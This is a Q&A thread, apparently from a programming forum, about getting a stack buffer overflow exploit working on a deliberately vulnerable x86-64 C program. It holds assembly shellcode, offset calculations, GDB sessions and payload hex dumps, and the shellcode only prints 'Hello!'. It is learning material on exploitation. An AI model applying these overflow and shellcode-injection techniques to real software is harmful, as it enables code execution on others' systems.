I am studying the stack-based buffer overflow vulnerability. I would like to inject the following shellcode I wrote:
BITS 64
jmp short one
two:
pop rcx
xor rax,rax
mov al, 4
xor rbx, rbx
inc rbx
xor rdx, rdx
mov dl, 15
int 0x80
mov al, 1
dec rbx
int 0x80
one:
call two
db "Hello, Friend.\n", 0x0a
I disabled ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) and compiled the program using -fno-stack-protector -z execstack, but still when I run the command:
root@computer# ./simple $(python3 -c 'print("A" * 64 + "\x6b\xe7\xff\xff\xff\x7f")')
this is what I get:
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkçÿÿÿ
Segmentation fault
The offset (64) was calculated in gdb (the distance between the variable buffer and rbp). The address in the command is the little-endian form of 0x7fffffffe76b, the address of the environment variable that holds the shellcode. I also hexdumped the injected program, making sure no null bytes were present:
00000000 eb 1a 59 48 31 c0 b0 04 48 31 db 48 ff c3 48 31 |..YH1...H1.H..H1|
00000010 d2 b2 0f cd 80 b0 01 48 ff cb cd 80 e8 e1 ff ff |.......H........|
00000020 ff 48 65 6c 6c 6f 2c 20 46 72 69 65 6e 64 2e 5c |.Hello, Friend.\|
00000030 6e 0a |n.|
00000032
The address was calculated using:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char **argv){
int pl = strlen(*argv);
char *addr = getenv(*++argv);
addr += (pl - strlen(*++argv))*2;
printf("\n%s @ %p\n\n", *--argv, addr);
}
A changed version of the program in Jon Erickson's book.
This is the program with the vulnerability:
//simple.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void hidden(void){
printf("Welcome to the dark side, young padawan");
exit(0);
}
void welcome(char *s){
char buffer[50];
//int placeholder = 13;
strcpy(buffer, "Welcome ");
strcat(buffer, s);
printf("%s\n", buffer);
}
int main(int argc, char **argv){
if(--argc < 1){
printf("\nUsage: %s [NAME]\n\n", *argv);
exit(1);
}
welcome(*++argv);
}
Lastly, I dug in using GDB, and I found a strange thing, which I don't know how to avoid (or fix):
(gdb) p $rbp - $rsp
$1 = 80
(gdb) x/48x $rsp-80
0x7fffffffdd90: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdda0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddb0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffddc0: 0x00000000 0x00000000 0xf7ffe180 0x00007fff
0x7fffffffddd0: 0x00000002 0x00000000 0x555551bf 0x00005555
0x7fffffffdde0: 0x00000000 0x00000000 0xffffe2cf 0x00007fff
0x7fffffffddf0: 0x636c6557 0x20656d6f 0x41414141 0x41414141
0x7fffffffde00: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde10: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde20: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffde30: 0x41414141 0x41414141 0xafc394c2 0xc335b8c3
0x7fffffffde40: 0xff007fbc 0x00007fff 0x00000000 0x00000001
(gdb) c
Continuing.
Welcome AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAïø5ü
Program received signal SIGSEGV, Segmentation fault.
0x00005555555551cd in welcome (s=0x7fffffffe2cf 'A' <repeats 64 times>, "\302\224ïø5ü\177") at simple.c:16
16 }
After the padding (0x41), the return address is ruined due to the double-byte representation of \xff.
Can someone help me understand why I am not able to inject the shellcode?
First of all, use 64-bit code when exploiting a 64-bit executable. int 0x80 is the old 32-bit syscall interface.
Second, you can pass the shellcode in the buffer itself, making it act as both the shellcode and padding. See below if you still want to use an environment variable.
I won't disable ASLR globally; instead I rely on GDB setting the appropriate personality of the debugged process to disable ASLR for that process only.
Since the process reads the string from the command line, this gets slightly tricky: the command line arguments shift the stack pointer down at the program entry point (the bigger they are, the lower the stack pointer will be), because Linux saves environment variables and command line arguments above the stack.
This will change the actual address where the shellcode will be loaded.
So you first need to know how big the shellcode will be, and for that you also need to know how much data is needed to overwrite the return address. You can find this out by inspecting the disassembly of welcome.
For a function this simple, objdump will suffice:
000000000000118b <welcome>:
118b: 55 push %rbp
118c: 48 89 e5 mov %rsp,%rbp
118f: 48 83 ec 50 sub $0x50,%rsp
1193: 48 89 7d b8 mov %rdi,-0x48(%rbp) ;message
1197: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
119b: 48 b9 57 65 6c 63 6f movabs $0x20656d6f636c6557,%rcx ;"Welcome "
11a2: 6d 65 20
11a5: 48 89 08 mov %rcx,(%rax)
11a8: c6 40 08 00 movb $0x0,0x8(%rax)
11ac: 48 8b 55 b8 mov -0x48(%rbp),%rdx ;message
11b0: 48 8d 45 c0 lea -0x40(%rbp),%rax ;buffer
11b4: 48 89 d6 mov %rdx,%rsi
11b7: 48 89 c7 mov %rax,%rdi
11ba: e8 91 fe ff ff call 1050 <strcat@plt> ;<--
11bf: 48 8d 45 c0 lea -0x40(%rbp),%rax
11c3: 48 89 c7 mov %rax,%rdi
11c6: e8 65 fe ff ff call 1030 <puts@plt>
11cb: 90 nop
11cc: c9 leave
11cd: c3 ret
You can see from my comments that the string buffer is at rbp-0x40.
So we need 64 bytes to reach the frame pointer plus 8 bytes to reach the return address plus 8 bytes of the return address itself.
But we start after the string "Welcome ", since this is a strcat, so the total shellcode size is 64 + 8 + 8 - 8 = 72 bytes.
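The size arithmetic can be written out as a small Python sketch. The constant names are only illustrative; the numbers are the ones read off the disassembly above.

```python
# Frame layout of welcome(), read off the disassembly (offsets relative to rbp).
BUFFER_OFFSET = -0x40   # lea -0x40(%rbp),%rax
SAVED_RBP_SIZE = 8      # pushed by "push %rbp"
RET_ADDR_SIZE = 8       # pushed by the call instruction
PREFIX = b"Welcome "    # already in buffer before our input is appended

to_saved_rbp = -BUFFER_OFFSET                           # bytes from buffer to saved rbp
total = to_saved_rbp + SAVED_RBP_SIZE + RET_ADDR_SIZE   # bytes through the return address
payload_len = total - len(PREFIX)                       # our input starts after the prefix

print(to_saved_rbp, total, payload_len)  # 64 80 72
```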
Create a file with 72 bytes:
> python -c 'print("A"*72, end="")' > shellcode
Now use this file and GDB to find out the address of buffer:
> gdb ./simple -ex 'b welcome' -ex 'r $(cat shellcode)' -ex 'p &buffer'
...
Breakpoint 1, welcome (s=0x7fffffffe78f 'A' <repeats 72 times>) at simple.c:13
13 strcpy(buffer, "Welcome ");
$1 = (char (*)[50]) 0x7fffffffe2d0
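0x7fffffffe2d0 is the address of buffer. Since our input is appended after the 8-byte string "Welcome ", the shellcode starts at buffer + 8, so we now know the address to return to: 0x7fffffffe2d8.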
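As a quick check of that address, here is a hedged Python sketch that adds the length of the prefix to the value GDB printed and shows the bytes in the little-endian order in which they must appear in memory. The address is the one from this particular session and will differ on other machines.

```python
import struct

BUFFER_ADDR = 0x7FFFFFFFE2D0   # value GDB printed for &buffer in this session
PREFIX = b"Welcome "           # strcpy'd into buffer before strcat appends our input

shellcode_addr = BUFFER_ADDR + len(PREFIX)
ret_bytes = struct.pack("<Q", shellcode_addr)   # 8 bytes, little-endian

print(hex(shellcode_addr))   # 0x7fffffffe2d8
print(ret_bytes.hex(" "))    # d8 e2 ff ff ff 7f 00 00
```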
It's time to write a shellcode and test it. Since we are passing it in the command line it must also not contain new lines. However printing a new line is useful to flush the current line to stdout, so I used an ugly hack to make a new line at the end of the string at runtime.
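Before trusting an assembled shellcode, it can help to scan it for bytes that will not survive the trip through the command line. The sketch below is a minimal check under the assumption that the argument is passed as an unquoted $(cat file): NUL ends the C string, and space, tab and newline trigger shell word splitting. The helper name find_bad_bytes is hypothetical, and the sample bytes are the assembled form of the shellcode in this answer, up to and including "Hello!A".

```python
# Bytes assumed unsafe for an unquoted $(cat file) argument:
# NUL terminates the C string; space, tab and newline cause word splitting.
BAD_BYTES = {0x00, 0x09, 0x0A, 0x20}

def find_bad_bytes(code: bytes, bad=BAD_BYTES):
    """Return (offset, value) pairs for every forbidden byte in code."""
    return [(i, b) for i, b in enumerate(code) if b in bad]

# Assembled bytes of this answer's first shellcode (code plus "Hello!A").
shellcode = bytes.fromhex(
    "6a01586a015f488d351c010101" "4881ee01010101"
    "c64606aa" "807606a0" "6a075a" "0f05"
    "6a3c58" "31ff" "0f05" "48656c6c6f2141"
)

print(find_bad_bytes(shellcode))   # []
print(find_bad_bytes(b"Hi\n"))     # [(2, 10)]
```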
The ugly shellcode is:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
mov BYTE [rsi+message.len-1], 0xaa ;Make the new line replacing the last char of the string
xor BYTE [rsi+message.len-1], 0xa0 ;Turn 0xaa into 0x0a
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!A" ;Last char is replaced with a new line
.len EQU $-message
Now assemble this:
> nasm shellcode.asm -o shellcode
and add any padding to make the file 64 bytes in size and then add the return address found above:
0000:0000 | 6A 01 58 6A 01 5F 48 8D 35 1C 01 01 01 48 81 EE | j.Xj._H.5....H.î
0000:0010 | 01 01 01 01 C6 46 06 AA 80 76 06 A0 6A 07 5A 0F | ....ÆF.ª.v. j.Z.
0000:0020 | 05 6A 3C 58 31 FF 0F 05 48 65 6C 6C 6F 21 41 41 | .j<X1ÿ..Hello!AA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | D8 E2 FF FF FF 7F 00 00 | Øâÿÿÿ...
The stack is aligned on 16 bytes so as long as your shellcode length is between 0x40 and 0x4f (ends included) the shellcode address won't change.
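The padding and address steps can also be scripted. The following is a sketch, not the exact procedure used above: build_payload is a hypothetical helper, the 0x90 bytes merely stand in for the assembled shellcode, and only the low 6 address bytes are emitted because NUL bytes cannot be part of a command line argument. Working with bytes rather than str also avoids the corruption visible in the question's GDB dump: in a UTF-8 locale, Python 3's print() encodes each code point from 0x80 upward as two bytes.

```python
import struct

def build_payload(shellcode: bytes, ret_addr: int, pad_to: int = 64,
                  addr_len: int = 6) -> bytes:
    """Pad shellcode with 'A' up to pad_to bytes, then append ret_addr little-endian."""
    if len(shellcode) > pad_to:
        raise ValueError("shellcode does not fit before the return address")
    padding = b"A" * (pad_to - len(shellcode))
    # Keep only the low addr_len bytes: the top two bytes of a user-space
    # x86-64 address are zero and cannot appear inside an argument string.
    addr = struct.pack("<Q", ret_addr)[:addr_len]
    return shellcode + padding + addr

# Stand-in for the assembled shellcode (hypothetical placeholder bytes).
fake_shellcode = b"\x90" * 47
payload = build_payload(fake_shellcode, 0x7FFFFFFFE2D8)

print(len(payload))            # 70
print(payload[-6:].hex(" "))   # d8 e2 ff ff ff 7f

# Why text-mode print() is unsuitable: U+00FF becomes two bytes in UTF-8.
print("\xff".encode("utf-8"))  # b'\xc3\xbf'
```

To produce the file, write the result in binary mode, for example open("shellcode", "wb").write(payload), or emit it with sys.stdout.buffer.write(payload) instead of print().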
Finally, run the shellcode:
> gdb ./simple -ex 'r $(cat shellcode)'
...
Welcome jXj_H�5H���F��v�jZj<X1�Hello!AAAAAAAAAAAAAAAAAA�����
Hello!
[Inferior 1 (process 168571) exited normally]
I assume you read the section above.
The address of the envar depends both on its size and on the size of the command line argument. The command line argument must be at least 64 + 6 bytes long (the two most significant bytes of the return address are zero, so 6 bytes suffice), and the shellcode can be any size. For the sake of simplicity, we can make both files 70 bytes long.
To be more precise: the address of the envar is sensitive to the size of the shellcode at byte granularity, but it is sensitive to the size of the command line argument only in 16-byte steps (this quantity was once called a paragraph), because the stack is aligned to this size.
Write a 70-byte file with a recognizable pattern, like:
0000:0000 | 43 41 4E 41 52 59 41 41 41 41 41 41 41 41 41 41 | CANARYAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it pattern. This will simulate the shellcode; it needs a few distinct bytes we can search for.
Create another 70-byte file with another pattern:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 41 41 41 41 41 41 | AAAAAA
Call it placeholder. This will simulate the command line argument.
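Both stand-in files are easy to generate instead of typing them in a hex editor. This is a minimal sketch; the function names are hypothetical, and the sizes and the CANARY marker are the ones used above.

```python
SIZE = 70  # 64 bytes of padding plus 6 address bytes, as in the text

def make_pattern(marker: bytes = b"CANARY", size: int = SIZE) -> bytes:
    """Searchable stand-in for the shellcode: marker followed by 'A' filler."""
    return marker + b"A" * (size - len(marker))

def make_placeholder(size: int = SIZE) -> bytes:
    """Stand-in for the command line argument: 'A' filler only."""
    return b"A" * size

pattern = make_pattern()
placeholder = make_placeholder()

print(len(pattern), len(placeholder))  # 70 70
print(pattern[:8])                     # b'CANARYAA'
```

Each value can then be written with open(name, "wb").write(data), so that no trailing newline is added.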
Find where the envar is with gdb. Remember that we need to pass 70 bytes as the command line argument to simulate the condition under which the program will be run.
The file placeholder will be used for this purpose, and the file pattern will be used for searching its first bytes in memory.
> SC=$(cat pattern) gdb ./simple -ex 'b main' -ex 'r $(cat placeholder)' -ex 'find /b1 $rsp, +3000, 0x43, 0x41, 0x4e, 0x41' -ex 'p $_'
...
Breakpoint 1, main (argc=2, argv=0x7fffffffe3f8) at simple.c:19
19 if(--argc < 1){
0x7fffffffec1f
1 pattern found.
$1 = (void *) 0x7fffffffec1f
Now edit placeholder and put the address found in its last 6 bytes:
0000:0000 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0010 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0020 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0030 | 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 | AAAAAAAAAAAAAAAA
0000:0040 | 1F EC FF FF FF 7F | .ìÿÿÿ.
This is the final value of the command line argument.
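The same edit can be done programmatically. The sketch below overwrites the last 6 bytes of the 70-byte argument with the address GDB reported; patch_tail is a hypothetical helper, and the address is specific to this session.

```python
import struct

ENV_ADDR = 0x7FFFFFFFEC1F  # address reported by GDB's find in this session

def patch_tail(arg: bytes, addr: int, addr_len: int = 6) -> bytes:
    """Overwrite the last addr_len bytes of arg with addr in little-endian order."""
    tail = struct.pack("<Q", addr)[:addr_len]
    return arg[:-addr_len] + tail

placeholder = b"A" * 70
final_arg = patch_tail(placeholder, ENV_ADDR)

print(len(final_arg))            # 70
print(final_arg[-6:].hex(" "))   # 1f ec ff ff ff 7f
```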
Finally, make the shellcode. It's pretty much the same but now we can use bytes of value 0x0a and I padded it to 70 bytes:
BITS 64
;Systemcalls numbers
%define SYS_WRITE 1
%define SYS_EXIT 60
;Constants
%define STDOUT 1
%define MASK 0x01010101
;Emulate a zero-free move of a byte
%macro zfmov 2
push %2
pop %1
%endm
;Emulate a zero-free "lea" (not 100% safe, if %2 is -MASK the displacement will be zero)
%macro zflea 2
lea %1, [REL %2 + MASK] ;Add the mask to avoid zeros for small displacements
sub %1, MASK ;Remove the mask
%endm
;--- Write a message ---
zfmov rax, SYS_WRITE
zfmov rdi, STDOUT
zflea rsi, message
zfmov rdx, message.len
syscall
;Exit
zfmov rax, SYS_EXIT
xor edi, edi
syscall
message db "Hello!", 0x0a ;An envar may contain 0x0a, so the new line is embedded directly
.len EQU $-message
TIMES 70 -($-$$) db 'A'
Assemble it:
> nasm shellcode.asm -o shellcode
We can now run it:
> SC=$(cat shellcode) gdb ./simple -ex 'r $(cat placeholder)'
...
Welcome CANARYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
Hello!
[Inferior 1 (process 170902) exited normally]
Our strategy has been to use GDB to replicate the runtime conditions under which the program will be exploited.
In the first section we were interested in finding the address of buffer. We realized that this depends on the size of the command line arguments, so we first found out the shellcode size by statically analyzing the program and then found the address of buffer using a fake shellcode.
The exploitation itself is pretty basic: the stack is executable and the return address is simply overwritten to steer the execution.
In the second section, we were interested in finding the address of an envar value that the kernel places above the stack.
We proceeded in the same manner: we used a fake command line argument, a fake shellcode with a recognizable pattern, and GDB to find the address of the envar value.
This time we must be more careful about the exact size, at least for the shellcode itself.
The exploitation is similar to the previous one, but the shellcode is inside an envar (which allows for newlines and whatnot).